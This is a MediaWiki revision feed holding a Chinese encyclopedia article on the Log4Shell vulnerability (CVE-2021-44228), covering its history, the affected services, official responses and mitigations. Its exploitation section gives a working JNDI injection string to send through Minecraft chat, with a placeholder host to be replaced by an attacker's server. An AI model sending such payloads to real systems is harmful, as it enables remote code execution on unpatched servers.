https://arolstar52-zhtest.hf.space/index.php?action=history&feed=atom&title=Log4Shell
Log4Shell - 版本历史
2026-06-25T18:12:49Z
在这个wiki上该页的修订历史
MediaWiki 1.43.8
https://arolstar52-zhtest.hf.space/index.php?title=Log4Shell&diff=4116906&oldid=prev
imported>JunnerX:它已經不是 zero-day 了
2026-05-06T16:45:21Z
<p>它已經不是 zero-day 了</p>
<p><b>新页面</b></p><div>'''Log4Shell'''指[[Log4j|Log4j 2.0(Log4J2)]]的一个[[远程代码执行|远程代码执行漏洞]],[[公共漏洞和暴露|公共漏洞和暴露编号]](CVE)为[https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 CVE-2021-44228] {{Wayback|url=https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 |date=20220330204941 }}<ref name=":1" />。被定性为“过去十年来最大、最关键的漏洞”<br />
<br />
== 事件经过 ==<br />
[[阿里巴巴集团]]于2021年11月24日发现并报告给[[Apache软件基金会|Apache]],并于12月9日在[[推文]]中发布了一个涉及 Log4j 2 中[[远程代码执行]]的[[零日攻击|零日漏洞]],其描述符为“Log4Shell”<ref name=":1">{{Cite web |title=CVE - CVE-2021-44228 |url=https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 |url-status=live |archive-url=https://web.archive.org/web/20220330204941/https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228 |archive-date=2022-05-30|access-date=2022-11-23 |website=cve.mitre.org }}</ref>,受影响的服务包括[[Cloudflare]]、[[iCloud]]、[[我的世界#Java版|我的世界:Java版]]、 [[Steam]]、[[腾讯QQ]]和[[推特]]。[[Apache软件基金会]]分配了最大CVSS Log4Shell 的严重等级为10,因为数百万台[[服务器]]可能容易受到该漏洞的攻击。网络安全公司{{tsl|en|Tenable, Inc.||Tenable}}将该漏洞描述为“过去十年中最大、最关键的漏洞”,Lunasec的Free Wortley将其描述为“灾难性的设计失败”。<br />
<br />
在美国,[[网络安全和基础设施安全局]]主任{{tsl|en|Jen Easterly|}}称该漏洞利用“至关重要”,并建议供应商优先考虑软件更新,和德国机构[[联邦信息安全办公室]](BSI)将该漏洞指定为处于最高威胁级别,称其为“极其严重的威胁情况”。{{tsl|en|Canadian Centre for Cyber Security|加拿大网络安全中心}}呼吁各组织立即采取行动。<br />
<br />
可以通过配置设置禁用导致漏洞的功能,该设置已在 Log4j 版本 2.15.0-rc1(2021年12月6日正式发布,漏洞发布前三天)中删除 ,并替换为各种设置限制远程查找,从而减轻漏洞。为提高安全性,此漏洞所基于的所有使用[[JNDI]]的功能将默认禁用,并且从版本 2.16.0 开始删除对消息查找的支持。<br />
<br />
官方的Minecraft:Java 版启动器已修补此漏洞。使用自定义启动器或自定义 Java 版本可能意味着客户端尚未打[[补丁]]。在没有修补此漏洞的服务器上玩游戏将允许服务器上的任何玩家在另一个客户端的计算机上执行潜在的恶意代码。在 1.18.1 以上的版本上玩单人游戏或多人游戏将防止此漏洞。低于 1.7 的版本不受影响。如果游戏服务器主机运行的是 [[我的世界|Minecraft]] 1.7-1.18 版本,则必须专门[[修補程式|修补]]其服务器,如果不这样做,任何[[玩家]]都可以[[漏洞利用|使用]]此[[漏洞]]。<br />
<br />
== 利用方法 ==<br />
在一个没有修复该漏洞的[[我的世界|Minecraft]]多人游戏服务器(如Minecraft1.12.2)通过聊天框发送该信息,示例如下:<br />
<syntaxhighlight lang="java"><br />
${jndi:ldap://wikipedia.org}<br />
</syntaxhighlight><br />
<br />
其中“wikipedia.org”可替换为攻击者的恶意网站<ref name=":0" />,例如[[DNSLog]]<ref name=":0">{{Cite web |title=DNSLog |script-title=DNSLog |url=https://dnslog.cn/ |url-status=no |website=[[DNSLog]] |language=en |access-date=2023-01-21 |archive-date=2022-12-17 |archive-url=https://web.archive.org/web/20221217150302/http://dnslog.cn/ }}</ref>,发送后攻击者客户端也会卡死崩溃,输出为:<br />
<syntaxhighlight lang="java"><br />
ReadTimeoutException : null<br />
</syntaxhighlight><br />
<br />
攻击者也可以将剑命名为该信息杀死人来触发该漏洞(在部分多人服务器被称为崩服剑)。<br />
<br />
== 防范方法 ==<br />
<br />
* 在服务器上打[[修補程式|补丁]]或者更新相应组件<br />
* 在服务器上安装聊天过滤插件禁止用户发送此类消息(通常禁止用户发送第一个字符为“[[$]]”的消息)来达到防范目的<br />
* 使用JVM参数关闭该功能<ref>{{Cite web |title=SpringCloud项目的log4j2漏洞解决方案详解流程-Finclip |url=https://www.finclip.com/news/f/19918.html |access-date=2022-11-24 |website=www.finclip.com |archive-date=2022-11-24 |archive-url=https://web.archive.org/web/20221124071023/https://www.finclip.com/news/f/19918.html |dead-url=no }}</ref><ref>{{Cite web |title=核弹级漏洞log4shell席卷全球!危及苹果腾讯百度网易,修改iPhone名称就可触发 {{!}} 量子位 |url=https://www.qbitai.com/2021/12/30904.html |access-date=2022-11-24 |language=zh-CN |archive-date=2022-11-24 |archive-url=https://web.archive.org/web/20221124071006/https://www.qbitai.com/2021/12/30904.html |dead-url=no }}</ref>:<syntaxhighlight lang="java"><br />
-Dlog4j2.formatMsgNoLookups=true<br />
</syntaxhighlight><br />
<br />
== 参考资料 ==<br />
{{reflist}}<br />
<br />
{{电脑入侵}}<br />
{{电脑小作品}}<br />
<br />
[[Category:注入漏洞]]</div>
imported>JunnerX